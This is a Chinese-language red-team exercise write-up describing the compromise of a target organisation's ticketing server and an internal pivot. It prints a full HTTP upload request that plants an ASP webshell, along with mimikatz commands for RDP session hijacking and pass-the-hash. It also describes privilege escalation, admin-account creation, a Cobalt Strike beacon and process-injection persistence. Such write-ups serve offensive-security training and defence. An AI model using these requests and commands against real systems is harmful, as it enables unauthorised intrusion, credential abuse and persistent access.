0x01 背景

参加了某次地市攻防演练，限制目标单位但不限目标系统，只要能够证明属于攻击单位目标资产的系统均可计分。主要规则：一、获取权限（攻击路径）：得分上限的对象是单个防守单位及其所有下属机构。根据不同系统不同权限给分 二、突破网络边界：整个目标单位突破同一类网络边界只给一次分。三、获取目标系统权：互联网、业务内网、核心生产网。四、数据分，不再一一介绍

0x02 获取服务器权限

通过信息收集获取目标单位备案IP

hunter和夸克等资产引擎上可利用的信息有但不多。

全端口扫描发现某票务系统

根据已知poc，通过文件上传漏洞获取服务器webshell

POST /SystemManager/Comm/CommFunHandler.ashx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=--------------------------354575237365372692397370
Content-Length: 873
----------------------------354575237365372692397370
Content-Disposition: form-data; name="file"; filename="1.txt"
<%Response.Write("this is test")
%>
----------------------------354575237365372692397370
Content-Disposition: form-data; name="fileName"
1.asp
----------------------------354575237365372692397370
Content-Disposition: form-data; name="Method"
UploadZoneImg
----------------------------354575237365372692397370
Content-Disposition: form-data; name="solutionNo"
----------------------------354575237365372692397370
Content-Disposition: form-data; name="siteNo"
1
----------------------------354575237365372692397370
Content-Disposition: form-data; name="showNo"
1
----------------------------354575237365372692397370
Content-Disposition: form-data; name="showingNo"
1
----------------------------354575237365372692397370--

但是获取asp webshell后发现存在许多问题。目前已知：

1、上传后的asp马权限低，无法在其他web目录上传文件，也无法使用冰蝎、哥斯拉等工具的代理转发功能。 

2、另外经过不断的测试，发现当前服务器利用这个poc只能传asp，aspx、ashx等格式文件均跳转，猜测已经做过一定的防护。

 3、reg、suo5等脚本均不执行。目前来看，除了想办法提权也没想到其他好方法，但提权后机器不出网，以高权限写入其他格式文件依旧不执行。在想办法如何进行下一步的时候，burp插件提示网站存在ueditor，决定利用这个上传点试一下。（（后期复盘发现并非所有采用该CMS的网站都存在ueditor路径，有些访问是404，实际测试的时候可以访问试一下）

经过测试发现可上传asmx格式的webshell（此截图为webshell管理工具的缓存会话）

使用tscanplus中的提权辅助工具获取可利用的提权漏洞信息,提权并添加系统管理员权限账号密码

查询3389服务状态和端口

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

使用HTTP代理功能，监听18888端口，以新添加大的管理员权限的账户访问被控服务器

2012R2版本系统，考虑RDP劫持服务器管理员桌面

privilege::debug #提权 
ts::sessions #查看当前主机的会话
token::elevate #提升本地管理员权限为system 
ts::remote /id:2 #劫持id为2的会话

或者

privilege::debug 
sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

（本地虚拟机复现）

0x03 内网横向

虽然当前获取了一台服务器权限，但只以当前转发HTTP流量的方式还是比较脆弱，最好多找几台内网的出网机器上线CS或者直接挂frp。tscan扫描内网发现一台部署了用友财务系统的机器importhttpscer接口处存在任意文件上传漏洞且可以正常出网，获取webshell后直接上线cs

上线后找个进程注入payload，简单做一下权限维持（截图仅为记录思路，实际测试可以多找几台）

有了跳板机，做了权限维持后，普通内网，接下来就是用tscan收集信息横向即可。